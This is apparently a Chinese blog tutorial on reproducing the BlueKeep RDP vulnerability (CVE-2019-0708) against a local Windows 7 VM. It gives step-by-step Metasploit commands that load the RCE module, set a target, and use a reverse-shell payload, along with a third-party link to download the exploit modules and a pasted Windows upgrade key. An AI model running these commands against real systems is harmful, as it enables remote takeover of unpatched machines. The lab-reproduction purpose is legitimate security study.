CVE-2019-0708 本地复现

时间:2022-07-22
本文章向大家介绍CVE-2019-0708 本地复现,主要内容包括其使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。

本文作者:Leafer(贝塔安全实验室-核心成员)

0708千呼万唤始出来,又将是一片腥风血雨

0x01:CVE-2019-0708的危害性

Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广,windows2003、windows2008、windows2008 R2、windows xp * 系统都会遭到攻击,该服务器漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的 。

0x02:复现环境

首先搭建环境,我这里使用的是win7旗舰版(家庭版升级而来),KALI自带的v5.0.45版本MSF。

(一) win7环境搭建

在VMware 14中安装windows7 SP1版本模拟受害机,在这里用的是清水表哥提供的系统。

Windows7 SP1下载链接:

ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/

在VM14中安装完SP1后会是win7家庭版,需要使用升级。

  1. 点击win图标
  2. 然后找到并打开Windows Anytime Upgrade,进入下一步。
  3. 在弹出的界面中选择“输入升级密钥”,进入下一步。
  4. 然后输入RHTBY-VWY6D-QJRJ9-JGQ3X-Q2289,点击下一步继续

在升级完之后就是win7旗舰版

接下来进入控制面板的所有控制面板项中的系统,点击远程设置。在远程设置中勾选允许运行任意版本即可。

在VMware 15中安装win7旗舰版时,可以直接在安装出选择。

(二) KALI环境搭建

1. 更新MSF

首先要将MSF更新到最新版本,在最新版本中才会包括0708的利用模块。

默认使用kali官方源来更新

apt-get update
apt-get install metasploit-framework

如果觉得官方源慢可以更换其他源

用leafpad打开sources.list,把其他源加入进去。

leafpad /etc/apt/sources.list
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
#阿里云kali更新源
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
#163 DEBIAN源
deb http://mirrors.163.com/debian wheezy main non-free contrib
deb-src http://mirrors.163.com/debian wheezy main non-free contrib
deb http://mirrors.163.com/debian wheezy-proposed-updates main non-free contrib
deb-src http://mirrors.163.com/debian wheezy-proposed-updates main non-free contrib
deb-src http://mirrors.163.com/debian-security wheezy/updates main non-free contrib

2.载入攻击模块

下载Reference中的攻击模块放入msf的相应文件夹中(如果已存在同名文件,直接覆盖即可。如没有则自己创建)

模块下载地址

链接:https://pan.baidu.com/s/1vIlYYn9RlJ0KUMTzFhMsVQ 提取码:ax18

里面有四个攻击模块

将攻击模块一一放入放入如下路径中

rdp.rb -> /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb -> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.db
cve_2019_0708_bluekeep.rb -> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb -> /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

3.使用攻击命令

使用msfconsole命令进入metasploit-framework框架

进入以后使用reload_all重新加载0708rdp利用模块

search查看是否加载成功

使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce启用0708RDP攻击模块

使用info可以查看工具相关信息以及设置

可以看到我们需要设置的选项主要为RHOSTS  RPORT  target
使用set RHOSTS 设置靶机IP</small>

使用set RPORT 设置靶机PORT

使用set target ID数字(可选为1-4)每种都代表了机器架构
在我的复现环境中使用target 3即可,如若不行尝试使用1,2,4

目标靶机的IP为192.168.100.248

接下来设置如下参数:

目标IP:set RHOSTS 192.168.100.248</small>

目标端口: set RPORT 3389

架构id: set target 3

载入playload: set payload generic/shell_reverse_tcp

设置完参数之后,使用run开启攻击。

可以看到反弹成功了,ip为目标机IP

使用background将这个会话挂起在后台运行

这种情况也代表成功了,使用sessions 6即可进入此会话

4. 遇到的问题

1) 配置完参数后也无法打成功

解决方法:1.多尝试几次

2)出现Set ForceExploit错误

解决方法:1.靶机IP无法访问,关闭防火墙 2.开启3389端口

3) 每次攻击都导致蓝屏

解决方法:1.尝试更换target id 2.查看对应系统版本是否正确

4) 模块加载不成功

解决方法:1.文件自身有问题 2.使用cp命令复制,同文件名没有覆盖 3.文件自定义命名方式错误

0x03 参考链接

win7开启远程桌面:

https://jingyan.baidu.com/article/63f23628177e6d0209ab3d60.html

kali 更新msf:

https://www.cnblogs.com/zuoxiaolongzzz/p/8927173.html

CVE-2019-0708远程桌面代码执行漏洞复现:

https://qiita.com/shimizukawasaki/items/024b296a4c9ae7c33961?from=groupmessage

添加CVE-2019-0708:

https://github.com/rapid7/metasploit-framework/pull/12283/files